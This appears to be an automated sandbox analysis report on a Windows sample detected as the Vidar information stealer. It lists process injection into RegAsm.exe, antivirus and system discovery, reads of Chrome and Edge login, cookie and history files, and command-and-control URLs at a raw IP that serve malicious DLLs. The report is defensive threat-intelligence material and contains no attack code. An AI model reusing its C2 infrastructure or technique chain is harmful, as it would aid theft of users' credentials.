Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

2_2_004111BE

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 422000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D95008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_001355CC cpuid

0_2_001355CC

Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0014807D
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_001400AF
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_001482D0
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_001483F9
Source: C:\Users\user\Desktop\file.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_00147C6A
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_001484FF
Source: C:\Users\user\Desktop\file.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_001485CE
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00140615
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00147F0C
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00147F57
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00147FF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	2_2_0040FCE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	2_2_19232112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	2_2_19232112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	2_2_1940FF17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_19423300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_19233AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	2_2_19422D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	2_2_19422DF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	2_2_19422CB6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_001359DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_001359DC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040FBCB GetProcessHeap,HeapAlloc,GetUserNameA,

2_2_0040FBCB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040FC92 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

2_2_0040FC92

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3264, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 3264, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar stealer

Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3264, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192D5910 sqlite3_mprintf,sqlite3_bind_int64,	2_2_192D5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1935D9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	2_2_1935D9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192ADB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	2_2_192ADB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19245C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	2_2_19245C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192B1FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_192B1FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192ADFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,	2_2_192ADFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192D51D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_192D51D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192C9090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,	2_2_192C9090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192ED3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_192ED3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192D55B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_192D55B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1935D4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,	2_2_1935D4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_193514D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	2_2_193514D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1930D610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_1930D610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19244820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,	2_2_19244820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19314D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,InitOnceBeginInitialize,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	2_2_19314D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19260FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	2_2_19260FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192A8200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,	2_2_192A8200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19288550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,	2_2_19288550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19258680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,	2_2_19258680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192806E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,	2_2_192806E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1925B400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,	2_2_1925B400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192F3770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_192F3770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_193137E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_193137E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1928EF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,	2_2_1928EF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192AE170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_192AE170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1929E090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	2_2_1929E090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1929E200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,	2_2_1929E200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192AA6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,	2_2_192AA6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192466C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	2_2_192466C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	511 Process Injection	1 Masquerading	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	511 Process Injection	LSASS Memory	141 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	12 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	3 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	54 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	HEUR/AGEN.1352999
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
steamcommunity.com	0%	Virustotal		Browse
t.me	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://store.steampowered.com/points/shop/	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	0%	URL Reputation	safe
https://116.202.5.235:9000EB	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://steamcommunity.com/?subsection=broadcasts	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	0%	URL Reputation	safe
https://store.steampowered.com/about/	0%	URL Reputation	safe
https://116.202.5.235:9000/soft	100%	Avira URL Cloud	malware
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://store.steampowered.com/news/	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	0%	URL Reputation	safe
https://store.steampowered.com/stats/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://store.steampowered.com/steam_refunds/	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://116.202.5.235:9000/softokn3.dllP	100%	Avira URL Cloud	malware
https://store.steampowered.com/legal/	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://116.202.5.235:9000/msvcp140.dll	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	0%	URL Reputation	safe
https://116.202.5.235:9000/softokn3.dlldge	100%	Avira URL Cloud	malware
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://steamcommunity.com/?subsection=broadcasts	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.s	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.s	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=6MtR	0%	Avira URL Cloud	safe
https://116.202.5.235:9000/mozglue.dllEdge	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	0%	Avira URL Cloud	safe
https://116.202.5.235:9000/nss3.dll2	100%	Avira URL Cloud	malware
https://116.202.5.235:9000/softokn3.dllf	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=6MtR	0%	Virustotal		Browse
https://116.202.5.235:9000/freebl3.dllEdge	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	Virustotal		Browse
https://116.202.5.235:9000	100%	Avira URL Cloud	malware
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en	0%	Virustotal		Browse
https://116.202.5.235:9000/vcruntime140.dllets	100%	Avira URL Cloud	malware
https://116.202.5.235:9000/msvcp140.dlldge	100%	Avira URL Cloud	malware
https://steamcommunity.com/login/home/?goto=profiles%2F76561199686524322	0%	Avira URL Cloud	safe
https://116.202.5.235:9000/sqlx.dll	100%	Avira URL Cloud	malware
https://116.202.5.235:9000ing	0%	Avira URL Cloud	safe
https://116.202.5.235:9000	3%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://steamcommunity.com/_	0%	Avira URL Cloud	safe
https://116.202.5.235:9000/softokn3.dll	100%	Avira URL Cloud	malware
https://116.202.5.235:9000/sqlx.dll	10%	Virustotal		Browse
https://116.202.5.235:9000/softokn3.dll2	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://steamcommunity.com/login/home/?goto=profiles%2F76561199686524322	0%	Virustotal		Browse
https://116.202.5.235:9000/nss3.dllft	100%	Avira URL Cloud	malware
https://116.202.5.235:9000/vcruntime140.dllUser	100%	Avira URL Cloud	malware
https://steamcommunity.com/my/wishlist/	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	Virustotal		Browse
https://t.me/	0%	Avira URL Cloud	safe
https://web.telegram.org	0%	Avira URL Cloud	safe
https://116.202.5.235:9000/vcruntime140.dll.	100%	Avira URL Cloud	malware
https://t.me/	0%	Virustotal		Browse
https://116.202.5.235:9000/v	100%	Avira URL Cloud	malware
https://steamcommunity.com/_	0%	Virustotal		Browse
https://steamcommunity.com/market/	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGAFt&a	0%	Avira URL Cloud	safe
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	0%	Avira URL Cloud	safe
https://116.202.5.235:9000/mozglue.dll	100%	Avira URL Cloud	malware
https://web.telegram.org	0%	Virustotal		Browse
https://steamcommunity.com/market/	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
steamcommunity.com	104.102.42.29	true	true	0%, Virustotal, Browse	unknown
t.me	149.154.167.99	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://t.me/k0mono	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://116.202.5.235:9000EB	RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	FHJEGI.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	FHJEGI.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://116.202.5.235:9000/soft	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://116.202.5.235:9000/softokn3.dllP	RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://116.202.5.235:9000/msvcp140.dll	RegAsm.exe, 00000002.00000002.2900946263.00000000013E9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2900806294.0000000001380000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
